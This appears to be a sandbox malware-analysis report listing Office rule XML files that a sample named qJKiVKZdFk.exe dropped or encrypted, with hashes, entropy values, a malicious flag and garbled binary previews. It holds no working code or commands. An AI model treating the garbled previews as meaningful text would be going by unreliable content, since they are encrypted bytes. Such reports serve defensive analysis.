                                                                                                                                      SHA-512:A332AEC34949B1B0AF7D62E2730FE9D28983ADD8DC7268C7ACF0EE84C4977C51A11137B589F7AEDF20EBABC1DF34A4F91F52F150F72DFAB002B455FC4DEF1628
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.m...^JH.N.ck v.%;..... .T.2a=....8...-3).."6...k....U.i.i_.!f..)1Y.x!HM..N2.(1.@.r...5..>z..&.I.H.4B.Z..+q...Y..X.).~./_V.)pu...MZ....A$..ybO[.@.@..z.y;gk...j.I_..`WIp......@9(.~s4D.9.....Z.bw.m.......w.K..x^.#..........:....ap.....>7..#........^,.u........2J..W....X...c...r...x7.{.....$_..'..v.8j=.FwIp....gJ.{`xe.E..`w8.KB}..E..o.J.2.`..\E.'.-.V...kJ F.:~..\..,..jY.v{:.....A.......OLH.b.h..B..!L.3......V....0..Q..D...QoF.......ls...>[.v.}..a.e..^.k..;e...H.\C......._..V....B...[...t.y.2.o....`[gA.........|..P.h........n.V..&....|.6..n...HceLB..F.Q.0.[4`}44.W...Y..5k...;0...<.o..Zl..#.a.90..'...>$l.o..l..,n.t.Z.....Lfz.)~..-\2W..!....).b.....3.1..f0.6.(A...K!.Y.q...Y...?...U.~.=..E.=<H....~.s......fb....=O.S.{x+V.O.nY.......!.S?O.".9M.Z~2_.<JE8 h...p.a.>.@...._1.|t.*....p.4..tp..4.........v.......P.N%V+#...s..k5..p|J;K........\2U\...MIh.....P9nz.tcUb..|ivu0.~X.....M?..S!S.*{.-q.....E.G.w.t...VfO..m..:.s.(x3.........4.M.pO

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230166v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1100
                                                                                                                                      Entropy (8bit):7.814102273265921
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:OQ7VkvG/JaYHAqVdCF+5iMFSshRb4HUd75rWQZkSXKNTbD:OJvG/swVV5iMFhhRUUXWQ2SaJD
                                                                                                                                      MD5:F2B6DB74CC1ABE9388C5C37A99631216
                                                                                                                                      SHA1:1B5CB3E1AAD3B4A195F751B7CB78872D8692083B
                                                                                                                                      SHA-256:6D0AD283C28EA86FF6950108CACE35D807A20043AADD52E4279F8E89F49FA7C5
                                                                                                                                      SHA-512:407FC8C77E0E4E5AE3DB6DD87F28340F6190C635C8B05E26C14CEB3E2500E14789B01B77F50FC957342F7892E42A755D2F3DF99ABB5178E6847A6C5A3627AAA7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlK..#.N.......7....#..s.oX.*..:..]B3...eD..9...f....i.l..-..."..c.1aGm"Y.`S`#..O...3.....h?I.VV.5Z..F|. y.s.'........88.<:.......QF..gId.....RL.?..F.%.w...H.L.:.k..h.R........2j......./N...^..a.r....H).\......+.... .X..B.0m...]d..H.\D.F.4.a...n<1...N......{..y\.....#K..s..).K.>E.(...V.^\.l...H]..l.uH?.IV..{.+.h..EE.6.7Q.....;.b+.z.2..B$.....(.....2...?`.qX....)Nzo..m..SPN;..u.u../.o.V..V..]...T#....U.._.... V.+......k0WE....Tzm.c...'."x)Y.rrn.....q....<..._c..m..n.....u...."U.Bh:.. .Pc.t.....}........U.ed.<.......<........n.a..q|.8..p....,.=.G3Gtr....V.....>.k......O.F..7r:..2.s....<...|'....'.gO.p..l:.-,dG{-...C.D.%.|=..Ror.b.WGWr].F...{..5..A9;S..4_1.~sT...,./....}@."i..%l...%Q.Oo....i*....g?a[.#..*....Y.T....=(..Q...Xx.W.`....R...r....W..*J.d.?>...R/.a}....s/.i....;%.[...u.&].Q..vp...[.-XN.&...Ff...i.8......CG...F..W.<.Y.......P.....;.z.......w.`S....sb..A~..4.F<A.%..w;s......b...G..;OCK...q.....o.k.Y=.U...!.%........c.,....Y..C.e.\..T...|[

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230167v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1712
                                                                                                                                      Entropy (8bit):7.864400192074962
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kLNg8XV/zElwZWYtSDDREQ4gq1YoVEQ6YmEQGpkJ1/2XXkehfU5GbD:eNXVbE606KhQ6LEQ3M7hcyD
                                                                                                                                      MD5:9E3B318BD2EF9A838266BD8F85CD0CBE
                                                                                                                                      SHA1:400E5A54B22821290FBC3116D723CD958945A564
                                                                                                                                      SHA-256:DB2AEE533EEA47672E5DC37DE6FEB1EEE4459538428E61D51C1AB5F51955CBDA
                                                                                                                                      SHA-512:77FED549D34B07819FCCF68D40F8B49C4FF304A6ADBE12AA0CD3B7A66C9CF9BE31B69A1E4BD9E1883A3D545E517C0B3FEFEC52C0310825C7EFD7E6767C3020F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...j..&.w..<.Q.nsi..TT.*.RB......v.Z.U.....(..f.:R.......Wl.L.U........m..\.LC.!..l.......7.(.....*ut...?...7..2j.#`....n@q.wc....k.\.7E.'H.|.I......9|j....k.6/...4ep.....L.H.A.....o..m..%...0...].G.....B..G....n.}.\....|.......v.i!.;..?n3.\..._..-.\.T}.x..TC.l.....5.(3..@...a.&.$.....J.T....=...../.t.v}.....h..aZ..Ga.p....*.N.@.:....k..^e.u..-.n..zW.....I...rk..M;J...t.7Z.]..7.pReA.e0..x2......nh:t.QQwS.....;..rs{.h.z.....A....D5/....S....a...\..TD.<..t.?...../...k...0..GY.....=.N.,.@.<vA..!S..;.5.{.6......*V.e..4M.L.+xZ.4....y........}3...9.7...].m.'c.........i..$Nu.&."F.........9.S7.......[(...?...3..1{...u9$.D..E.d....s.;p..e..)/..N....K.D./CQ...K@W.K..-7.&U...j.iy.`EJ..wE...B...].i.>....b..*..<..R-...9.....l...-c)\.....4c.0......".%F..H..bg.db\.zc.@.....<.7.e.Qv........v.0.yl%hkx3...Jg.}..sP.......:.*a&~m*....p$:........#.........Z..afv.M....qcr?.....h...J.0._.OA...H.1Lh.-.2P\.L...fz.M..r.@7.yd#..H.e=.v..ob....*c....B.oj..w.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230168v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3440
                                                                                                                                      Entropy (8bit):7.940496251403029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:RT7w1SG1W4YEE7E8gz09Ow+QB2eCfGH9YREQ1P76yzpbK4:JdAWWEY8F9QQMeCfLlT3p7
                                                                                                                                      MD5:BD35C58F352D50EE690EC2EB71EA1984
                                                                                                                                      SHA1:2DAFF7FBB3A306B058AA760906D9888D07E2143D
                                                                                                                                      SHA-256:35EEEA01C03CC2B98E53A5968B22975018BF640F65E0B2A58004743FE4B794CC
                                                                                                                                      SHA-512:656BDC5D7576C79E9E818A9D11E2EB64F0F25ACC9B9E58ABD9800D435C2B1113C0268F782812601349529C11955A3DEE7510D37FE1E6B059DDC539FA1B5A6FC0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml,..}.........k@.....l.....p..(...BP)&.NtK.u....<ea.v}.l.gh.. .R.W..z..X.9.ue..X0C..?I.A3.3..ci.b}.....Ab..:..3..eo...-;.{..y.=.%.....&7.rf.t.........`QI..3......t........T;..X.......B...w.cD...+........j....s....v~.T.....l.b....B.'......4....Mp..]....,..n..6...P....vF(_<...v.(.,.lqX.hN.3.U..aA.Rei>m..?..H...........r...\..l....7.D..\..>Kbw...LA.!~5.....p......O.6gw.w..K..v.....u@@..e..+.A9...U.0...n&..O.v...V.d6..O.L..n...C)..@.....f.K...EVC.I..(...S...R..\p.(.....-l.u.....t...3.o1R....&...Z..^......`.V.$..,YRe.>.FL..-b...H...j..]...._VGu.Lm7z.2.....7.....$Q2...i..'?....WX(L...^.0.Cs.......**..X.s3-............$..X.a&...VH.......xh.P.<.).H...o{......h..=ro=...wz.._a..=....`.<!..Jq..7..L......X~...3..^.e........t.z.5V|...vo....c...AM.....yo....E...P.^....._d&.0../..(.A...... S..c..x...(i.).i{.D;..mE.W...Ey..c..GL%)*a;......V...-...t.go..w.0.!..,Y.'...)U...YKWt..?.".S.!..yx...y.....rm^h.......Az..".E.q#........../]....,..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230169v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7735
                                                                                                                                      Entropy (8bit):7.976022316922309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:AuJgbseSmTJdq+2dPyeIPjW9BkfJig81Uqd8:AFb++2d9I28NW/8
                                                                                                                                      MD5:EBEE59E16A64102C7B5CC193CACB31D0
                                                                                                                                      SHA1:9B3D7A7D46A7DC17FB5B5BE7D33D6C5341379041
                                                                                                                                      SHA-256:0E88EF8A27F57A4DAFCEEC0CE07CCC9A44DFB818AFA4DE2BEDF657123C76A2CD
                                                                                                                                      SHA-512:CB72B80D9D8C56E6F1672B8BD7E93ECC39D07DA2F3E2B7F9BD5DB013F1B441515F727929F56E27362A9DC44451570A5BA1D4F9F079FB4E429FDFEDAF746F6A2D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlI..{.....Z...V!.).H..k</.7.D. a.....x#X.U.Z.......V....H.X5!.vS..#S.)H.G .i.8d..)O..?...K..#..c.rf.}0.1......4 O...".:...zi..q..eT...M.......@..f....m.Kn"D.4.....a.izC..7*N}....6C...=G..*..=...T`..v{....q_}}4;..b.....|..HR..-T..N.....:q3.......5...r.."..*E...H6..p...9..RPUI..f#....G'Z.....D$.e..;......s...d.?N..6#g"X....z....zP.........-....{g...w*..sj.N...Orh.Ba'.?O.....PS...1...'...#...@...\R..{....)&...`.....~.Rwl2d.....]..l.....LF.u.zt=...'.i..y..e}.J..~(.........1.a.9\.(...o........S..a..o...Q.3....%7_o..[.a2.3,....+)z.-.l...F.#..D.G.bu.Bt.)!.8Rop..rI..b.&.g.#-...^.B..R.~....p..0(]..o-....."....,.....3..ROE.J...u}.....&.)..8.*...H...t"W....C!.%LK@+...]..#d..".....].....?........g.cp....G.....!~B........eS..Q.p....i;..t.....W.".d"......iv6..[/..\....8..i....[g..G.....y.....E.7T.&=..D..tOD..`_.K`.si.d.....;.3..o....Z......[.0.....\<....=.-~..H.Z*..(o..j=.^D..`.9I,..$...A.....m.......S...$.s;Ff.,.qEO..."."..qgDf.l.....J

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):23958
                                                                                                                                      Entropy (8bit):7.992639015494048
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:XEi5rlLYXr8IXs4PZzlRg3skhdNk/Uq3MJ+pokFDRZgWKcx4kHh2ErvxAYzpsHdP:XEiX8Xr8IXsc0s67kNMwDzgWKM4kHMkM
                                                                                                                                      MD5:E077252E6D786CEA88AC35F3A990DC09
                                                                                                                                      SHA1:C1E8C9D3A41F85946BB723422EED9B9A41BA8462
                                                                                                                                      SHA-256:80A52EF531C9EE0443DE5953D4139F5E021A6B25DDEA333F1720E3BDE59318F3
                                                                                                                                      SHA-512:50802510C8C3B24C2B775D43A23141090BACA3F6EC48F9A90815801A1975582CE569CA663B0F4C283D347D2DC00E503180C7311F5ECA66DDE5328F32514A1466
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<?xml.....M..9#.......H;g...;..Y....^...m.".h}....(.u.m............h...K....\.)U..0......?`.x.-\5A.*"....5...a...qY.(.n%../l..W/..Zv..}=.`..u.....O"c.&..\.!..,!W..3....}x.rM.k..r.A......V...n.B=......Q`bz..,....N..9.Q....1s.+..A..'..,...(.09..nofE.../.X.z....kYwq..5.....I.....F.....=gB..uT'Q.:..7.......p3Yj,..18{..<..g.]..0...wO|.p..B./cd..9...#{.$..D.?FLm..'1.s}.#1a+.....| c....t7|....O........Q...*>.By.M..=..d.F.O`.....L....3:...>B.....P..{.f.p.....9 .!.P..0:..d.IQ..*~...........L~.z.^....'C..Y\.i"m.....+....N.yk.@...l.qQ.&..4.@...?6'....g.....BP........VGv....A&.h.........tSq`.i. L.y..\...0#...T..iH-h{....W.it.'......)..'g...%q.O.#...O..$.tr..1..2...x..o..q.a.~R...xl).....};.)F6....s..4..a........|.....k.G...+6(...{.x..t.q..g....V._.?........K.~..1.A.UE...0...KLp(\.{..m.].7..)..i.......6:3/........g.]P.Y-&.....X..G...!4c..Y...n1Ck..\.."..".l.B....TM.w....@....b..U..8.t3mO..].w..l..E.v.{...........N..Q.;.)...9_r....8v..*m6.......s.h.Ha

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230171v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1767
                                                                                                                                      Entropy (8bit):7.883958317769623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:/DpYQ9ZUkUVzo5H1YvU+w+SYAp+PXnnh0Tt54/BNpD:/DmQn4ShJZ+lAp+AteNB
                                                                                                                                      MD5:0923C7D76CD375435A4B63A6A1BA7EA9
                                                                                                                                      SHA1:783554C0BF63A9BDD878759BF6B239D35EDC5010
                                                                                                                                      SHA-256:6E5B28A39DBF06DD66E07EBB7858517EFEBFA37773CE97BFC88BA608BE97645E
                                                                                                                                      SHA-512:24CA51A7EC579595BBCEBC4978827D6EB59A7D11C8A3B3E16308C857F4F72941DAB0536D26B5C6554113C18AD87BF4F33922C5FEE8D8A8E7819D3942E1D7E0AD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..1.......".y.&G.n......d.....( .w.7bH......6x....#63....Is...............'..;UvX....6.z..<X..<..`..Ajfe..PQ....../.e.7..[`...0..X.-....s>.d,.]....E..!.~T.....R.^`.~........@wrl...n..Ub.:..|..{...?....S.>...9..mx:.........!1..A$A1..r.Z....0.e..;.ko...A.....j.q.... ..+a.27.e4.G'..S.......w...Wo...tp.....-.T..6..<`.j...d.....{.Kr..n...d.d;....c....c+Z..|..~...K....U......m>$N.F.E..B..e....L...4..aa..`46.|.....G9..U.t.l.S.[._..."...~w.I.sj%{o..?.r..`..T}....w..9.J..i@...n..;R.T..6.l......g#Z..c...g..Ia.j..}.-^!.....b..E.t.D.*;.r..J...bE.2bf...J..C5.Q...XS......_.....[..1...Z..H..;x...........9.>3jt.`>.Q..S...eDy...*R............eL1.jx3....X.9.f..sV.H...P........r....k.z.6x..... ....'}..........f.....a."...X.)...Yk..}......aoW...R`......g.E.M.......Z...p...=z..RK..$.X..0.p.q..8$S.=...W......].....[.S..V<N.....?.q...h8...S..s..a..0BL.p..E...@=.\3..x..mp.....F"C.)U...1..'Z.t.."t@....h].@...$h)..w.k....X^d..u.l.f.....K>X.o.z...W..4..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31744
                                                                                                                                      Entropy (8bit):7.993341632578711
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:h/WSUyX4kmuZS2xXU+RXLGo3Rj/ZFYRdZQ2XO22sJTU3:hxUyX4kmuZXvXLp/YRpksJ8
                                                                                                                                      MD5:CF8EF137C8DD09AC4D171AFA4F594ADF
                                                                                                                                      SHA1:B36C22B4B1623E7E8355AFA9E6A4471E53D3D082
                                                                                                                                      SHA-256:64782E94C8AC89BF36255B2C0C8BEBDF18ADDC83FBE6A15E5285B64A67FD58A7
                                                                                                                                      SHA-512:EC3BEF629DCF7FE2FC6B39AE648C0F3384D4EC32926C391ECE6ABD2166E60DA0CBB3F83B0FABB6FD031B10B4FAA6607CCEE6DBAC1AB36FBC666FE169DA633BA6
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<?xml*..S.........,..[ .VU^mi........B.........:.hJ^C.x6.W.wsj...f..`R..j......L?...3.....e..D.N...n.'..../.....-....m*..... ..p\.o56...^z..n.s..mN..F.tqU._X...Y>.:....\...*0.*.W,.J.\..js..K9.?z.XD82~J..1.....0..L...G...z.g..Hy76...nE..9...m....\1..p..-1`.fFq.c.YH.t.a.............A.........!..%9.1...+.:N?....I........r<.E..1..j._/.fF.0.87i.r.j.(+.@H$..........}'.{o...i<.^+!..z4AO..4.....!...N.'"..Q.. ......t..W.....w..c.XG.a.CL...[x.....CXp.....Ew;...{.^.1.P.X. ....wR.,./6k.;...t....h...<H.gm.A..z`el...w.......EU...!M..T..z.u.6T....6..7.'$D+..uc..Cj.....t.HN0>.-......0v.1.~.K"F}.H..Y..S...........'d.....[..8T..<f..REeP.<9.X..._1..&.r.H...Dn..OYcS... %.@.r"Q.HF.2..KA7..k...q.j^.l..g8.?.bK.,.....6...*...{..'yA....ty^.J.j*}..C..f...[..6......z...".O.%..]Mj..../.w=]g....WEJe.a..e...h...tZI.P>u.CV....S........5....<.^.:.X..|...f.f3....RsWK....J.k,..N$.\.K..k..*]j..n.=..?....j..m.....k....s..>.Q.v..V..S=.....2s..7...t.r......j0......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230173v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6372
                                                                                                                                      Entropy (8bit):7.96979493345818
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:fisgFGs0FfP26dZF7Ys/53/v8pq7fWlUyQ0G3ufC80/26kaaVu9oMSdqIc6JozkF:fhgFGT2EFd/v8kwKz3l80/M1MCq5fa
                                                                                                                                      MD5:1D3E3500A3F2A747543A489CDC67A8F9
                                                                                                                                      SHA1:5919FDA0A73AF13D4E657403C8C7DE7442A28C7C
                                                                                                                                      SHA-256:4AA5958E44EED628C741AE30C2D07863C4053A78980E72249852CC67B67041B1
                                                                                                                                      SHA-512:5AFAC64C9E94EDC4EA7F6DFB16AC01E7AFFB6B3B5EDCA73ED0BFB840047460481875C1CB23A2208E5C0E2C5781F80EABEDEB9B33D6FEB9DB10D88D1D07EF6FF4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.<.....7E.l.d....y.5...si~.7..E.Q.h~.0.v...{........h/..!k.......^.....`c..MB.je.;`.J..%...G...;.Rk*Dn...F{.u.T..2.c.!J....[v....y.....2..~.....R.7xf ..rp.$.N.....(...t.a.e.:...a..U...&E....g6..zF/M.C.6.}...p!$.....%H.R.e.?...g0..6...W..SAP.p<._..g..z.......v....7`.9...!>.............?..9.......7$.n...W.9J..u.VT...+.oi.y.....i..t...4.(.+.........i.S9dR..c..Q.u$./&.q.o.m.../;...[y..k ;h..A. ..+......o.......'N..(...e:...fD.,9..-.;IM..K.r\4.y.W.l...I.6.P..w..m.fb..W..........4.6..G.,r......l....*S...`,?..../2;.+.kw.t Wv....A...j{.%..\.c.C...y...zj-G$..|Y.i.>...\.$..[.r.......Po..A.}.<.w^....cV.]T...a.pl.=.;(j.(..'p.....J..a.o.....y~..../.....x.0l.O.;.......@..O1h..uc&k)6...|..7.../..u....b|..U{..g...=.5w..../T..N.A.U.M...-8.....@..ql.?.T..t.w.m._...C... .)..E.|.#I*.\P_.0`h...$.-.A.=.c/3.9.%..p.wMQN....n..r.~...Z@.....;....s......G..)D.^.H.T....>.a]e.W6Ca.........~?..=#K.F.X.(v..4.e<..C..O#o.r.h......`*.[46....fZ.s.*..V.W....e...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230174v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2482
                                                                                                                                      Entropy (8bit):7.926546113388734
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:+lsnefJ9EBl8GgGD0HIoRKX/PQNOdOLJBy29aah/Q/pp7Xrs73LjcLeG/D:+WeB9ErNroRKPPpOLdHO/pp7XrsPj8r
                                                                                                                                      MD5:D3C4032BD232C3117CF27CDEF8A2C91B
                                                                                                                                      SHA1:6EDCCFF9D211180BA3787BE2D652A550147EB4B9
                                                                                                                                      SHA-256:73997343554A4FC275E2C4CCC505BCCD60029DAE54FA37A907F5C985BDC6550B
                                                                                                                                      SHA-512:4D9DD66D8774994A297DC39D99C25F680BE7233F4250E2FFA0005444005236FADA39E2D09900689E2AC4A5FCD5A9275FF44CF80F6FD0DB4188730781BB9935E6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml,.1..3}....k..\....?...!N..)...}"..w[..9..P..r.....zw.......0.Z......o. .(p..v........\n.......{..lo.6..g.t..^GD..P!_...).... $..RY.>.......a...B..l...Z...L.K%j.M...n.u......7..~I..0>sz........]...p....G/.O..j=.....;..0Kn1q64..|..h*....q................E.Yl|*..5....q`j*..q..=..k.LI..&q..=......C..@...Mo..3dx>.>.#..%.;b..27a...].."...y.FpA.)..H!.U..+I..D...4.$8.....}.P.N..E...m0......U7u4.0.^.y.Z....d..W.$t..W..S,.h/.X....l.....+...2s...bC..Z. Cfy....fK.a..tlp.||\.I(..>..V....=..,...*./T<..\..6yV...G...h..Z....FrX...oD.Tv..p.X....ILl..!.........G..j......65.....*^/.Y<%..kT.Go(Q.....KGL&..%...z......FJ....(.g....0...}..c..C.(.|...M.;...4:..GHv.).J.....%.T.f./..>......I...|J%#.Km..+Z...]%l.....G.7[ht.0.Z.......e.R.F5.....W..'.!#...8r.X.m..'..:9...q.jf.......(|']rE..C....6......\.qag\;...o....y....!G.........r7/.IO...:JQ...6.svyn"}...Ghm..~..R..n....>9qO..)qjDe!.:i........:..-.w...K:v}...d.p.W&. ..-..p.'.?..$...cg..o...?qPzt.L..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230200v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1803
                                                                                                                                      Entropy (8bit):7.8941121523220215
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fTyxH1urkNPdtWPALiN3iHBDSUXq80mcpT3isn4Vu72MFDsHqgslkpytbD:f85dtWPALU3iHhSUXE4VNMFIHqbltND
                                                                                                                                      MD5:287E557B1E420B5B3E498654E53611B5
                                                                                                                                      SHA1:DD078F7541D8ACB38D4E583176CABC20ACB4DF16
                                                                                                                                      SHA-256:A9B5B265841704CAB1B8D9D7ACE54392C2953F857A48ACA8DA939E8179241C07
                                                                                                                                      SHA-512:DB8227CB69119ECF1D8F7B556C0AAE3282E65F3A03824B6EDF98AE21E26647445E4F712FD303E33BB486E47CADE36F0FB46E62B32681B5C87DA0335F0D356AD2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmln..G..x('.1..k.c.x..dB(S.....NY..-.&.\..Sb..+|VK.]....<h*...).....S5.r]..-E...:.T.........f.l...|a...?1Z...[.se..kf)..........=.%{'..!3......M.W.......B..oo.../34f[...O...Z7.x.b..cK.!.vs...&....1.........e.U.....".....I...9.l...wU.(.@4......n..#..x../.b"Q,.{.5Pi......Sf(6.{..it&Q.j......U..$\.0.]._.GJ7 .|W............ql:@b....."..Y.N.a..|WV...5[.Jt...~]d....p..5.k1%|W..c..(.....k......H*q..G...d<v.(.jR9.k....M4f...~..:.`r......~,G... .x.(..f....<g....2.F.P..KQ.[../.....;@.%..%Z..?.....j.k.]...b.g..?@...j....>....7t..~..T&;..E.....%3.x.........gn..Z.../h".....?0..IcQ*G.....t..G....T..|...~. ...K.y..5V.R"......|.=....T p+..Q.NE......G....]:...7..p.F.v.K.Xb.U.g...!...Y...d..Ldm-.....y.3....\.........~.8...CG..;.3z...j.26$l.d.%%...S.J.-_..s.....j...ew|..'X@..m.......c..K..9...2.......]...t.d.>Q&.7........c..-.#.cjP..Av4..p..e.....W..".*..xV.0N......}/H...._Q|..zU.G.[....:......J..`6...C..sB...x.'}.)>...x..\J8ir...J+.`}60..X...'.xF.\

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700000v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2037
                                                                                                                                      Entropy (8bit):7.906054894150856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ASt8kdFQUsP2SdjHa2U37/5CDRXGwIp8Wcx70D:/tXAUsP2IHzZNGXOxk
                                                                                                                                      MD5:9EE35DC41A1739DF5CC8D707753FC61B
                                                                                                                                      SHA1:7000AA581A6BD718C9ECF581F1EF7415D1D57CB7
                                                                                                                                      SHA-256:F9D7D8A85E3A1EE19CB192A028F6A96DB38C99CC769D539EE49C39F911A7EB44
                                                                                                                                      SHA-512:2301900D616BD1A8A2FE24DFD0A94773A5494C64E7CDBA60E894A97F8CE5E11D4EB8A2DBEB9FE5D3198B3ED2415599D40B5EC9DA877D8A5074CC125A4CCCBC7F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.*.m.X..g.\..bEJ.U.....]?./.s....t.x..e.a9.x.@i._B...1..;.<.[.....\8 .L.........#;.`..*._..... ..7P\.U..F$.+..Sw@y..u..x..7..WP4I,......ri...E..O.#..j3(..0.'......C.......e....,)..G......$^B..;{G........o.. .v...l.v..JE..@.. x...(..MM.:..:......|...*.q.&.WoO.......(..#..1Z..a...w=G....^./.?uMh.....S~Y..........;..D]......!.6.<.RX...n..8...\.]...%...H.W..n..g..#..h...^......XW........0j....h.t.=.../.w.oR...w...@.,*tjw.b..U..+...`......5.......$...3...b...Y...(.0....U..J....H..6>...vD.;},8g.e.j....#...Bl..b.[L^.k}Uw.B.3-Xz....K.....8...{.*.A...M#....g.].^.....ck.&.......g.eG..SfEy` .........t....bd.Y...C.p.-..\.!x\.RZAF.....[X.w.?b!){..r.2.z.......v..oe:......f...W....`p0....v.a...>.H9...a..~yS'.....T.=..^....)....@.xX......kq.`..H..e....Pt....[.AE$'0...:&.&.F.UPSO...*.{.qNu.-e...P.+n.F.>.z....k.,'z..G.n.....ww..C.A..d....UL.Elp...!N.O.Q.... .-.+.X..a^..M....f..."4.^.......=8n.erx,v.KR.X.T/...{.aQ.\...7...OT.W&.WJ...K..F.{.#..I.[H

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700001v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2074
                                                                                                                                      Entropy (8bit):7.914116885177121
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:v7561Cj9GHpoJ4iIrZfjrkakcH7RnnDcS2qgYqPToWt5ZD:v7ks0HGJ4iQ3RnbBISoYqPToi5R
                                                                                                                                      MD5:960BF8E068052529BACB89A96EBB05BA
                                                                                                                                      SHA1:7855F5F9B06A2EA0058DD36C16AF15968380437A
                                                                                                                                      SHA-256:EB9638A9717F33619380DCE4DD50C729056544732204B74A3AA0AF3C35CB4E48
                                                                                                                                      SHA-512:3EF0329DC732648C6A53045A435251A317AEB4C06B2BF5AFF5064E6C6DF83E39312BDB90B3C562E4F400CA99A2F548525E5869128D5CE9887398B2B83F4A972A
                                                                                                                                      Malicious:false
